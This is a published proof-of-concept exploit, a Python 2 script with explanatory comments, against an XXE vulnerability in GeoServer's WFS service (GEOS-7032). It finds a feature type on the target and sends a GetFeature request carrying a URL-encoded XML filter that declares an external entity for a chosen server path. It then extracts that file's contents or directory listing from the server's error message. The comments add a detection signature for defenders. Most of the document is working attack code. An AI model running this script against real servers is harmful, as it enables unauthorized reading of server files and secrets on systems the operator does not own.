# Exploit Title : GeoServer XXE
# Date : 11/08/2015
# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)
# Vendor homepage : http://geoserver.org
# Software Link : http://geoserver.org/release/stable
# Version : 2.7 : <2.7.1.1 / 2.6 : <2.6.4 / 2.5 : <2.5.5.1
# Tested : Client Windows, Server Linux/Jetty
# Vendor bug track : GEOS-7032
# CVE : No CVE
# Category : Webapps
# Description : An XXE vulnerability in GeoServer allows an attacker to read file contents and list directories on the server.
from xml.etree import ElementTree
import sys
import urllib2
import urllib
def main():
    """Proof of concept for the GeoServer WFS XXE tracked as GEOS-7032.

    Usage: ``geoserver-xxe.py [URL] [File Or Dir]`` (see the ``sys.argv``
    check below).

    Flow: fetch the WFS capabilities document, take the first feature type
    name it lists, then issue a GetFeature request whose ``FILTER`` parameter
    is an XML document carrying a DOCTYPE that declares an external entity
    pointing at ``file://<path>``.  The script expects the server's reply to
    quote the expanded entity between ``Illegal property name:`` and
    ``for feature type`` and prints only that slice.

    Defender notes: the weakness is the WFS endpoint parsing a client-supplied
    XML filter with DTD / external-entity resolution enabled; the affected
    version ranges are given in the file header.  Requests to ``/wfs`` whose
    ``FILTER`` value contains ``<!DOCTYPE`` or ``<!ENTITY`` are the observable
    signature of this technique in access logs.

    Returns:
        None.  Progress and results go to stdout; any failure inside the
        ``try`` block is reported with one generic message (bare ``except``).
    """
    print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n'
    # Exactly two positional arguments: the GeoServer base URL and the
    # server-side path to read.
    if len(sys.argv) != 3 :
        print "Usage geoserver-xxe.py [URL] [File Or Dir]"
        return
    geoServerUrl = sys.argv[1]
    fileName = sys.argv[2]
    # Capabilities document: used only to discover a valid TYPENAME so the
    # GetFeature request gets as far as filter parsing.
    featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities"
    # URL-encoded FILTER payload.  Decoded, it is an XML document with a
    # DOCTYPE declaring <!ENTITY xxe SYSTEM "file://@targetFile@"> and
    # referencing &xxe; inside <PropertyName>.  The two @...@ tokens are
    # substituted further down; entity expansion happens server-side when
    # the filter is parsed.
    exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E"
    # Not wrapped in the try below: a wrong URL or unreachable host raises
    # straight out of main().
    response = urllib2.urlopen(featuresUrl)
    root = ElementTree.fromstring(response.read())
    print "Searching geoserver features ... : \n"
    gsFeatures = []
    # Tags are matched by substring (presumably to tolerate namespace
    # prefixes), so any element whose tag contains 'Name' below an element
    # whose tag contains 'FeatureTypeList' is collected.
    for node in root.iter():
        if 'FeatureTypeList' in node.tag :
            for feature in node.iter():
                if 'Name' in feature.tag :
                    gsFeatures.append(feature.text)
                    print "Feature found :" + feature.text
    if not gsFeatures:
        print "No geoserver feature found, wrong url ?"
        return
    print "\nCandidate used : " + gsFeatures[0] + "\n"
    print "Trying XXE : "
    print "-------------\n"
    # Only the first discovered feature type is used.
    exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0])
    # fileName is inserted verbatim, without URL-encoding; a path containing
    # characters that need escaping must be pre-encoded by the caller.
    exploitUrl = exploitUrl.replace("@targetFile@",fileName)
    print exploitUrl + "\n\n"
    try :
        response = urllib2.urlopen(exploitUrl)
        # Clean output from exceptions string
        # The leak channel: the reply is expected to echo the expanded entity
        # inside a message delimited by the two markers below (presumably a
        # server-side validation error); only that slice is printed.
        trashOutput = response.read()
        beginRef = "Illegal property name:"
        endRef = "for feature type"
        fileStart = trashOutput.index(beginRef) + len(beginRef)
        fileStop = trashOutput.index(endRef)
        print "Output"
        print "-------\n"
        print trashOutput[fileStart:fileStop].strip()
    except :
        # Bare except: errors raised by urlopen and the ValueError from
        # .index() when either marker is absent all collapse into this one
        # message, so an unreadable path and a patched server are
        # indistinguishable from this output.
        print "An error occured, maybe a premission error"
# Script entry point: only run when executed directly, not on import.
if __name__ == "__main__":
    main()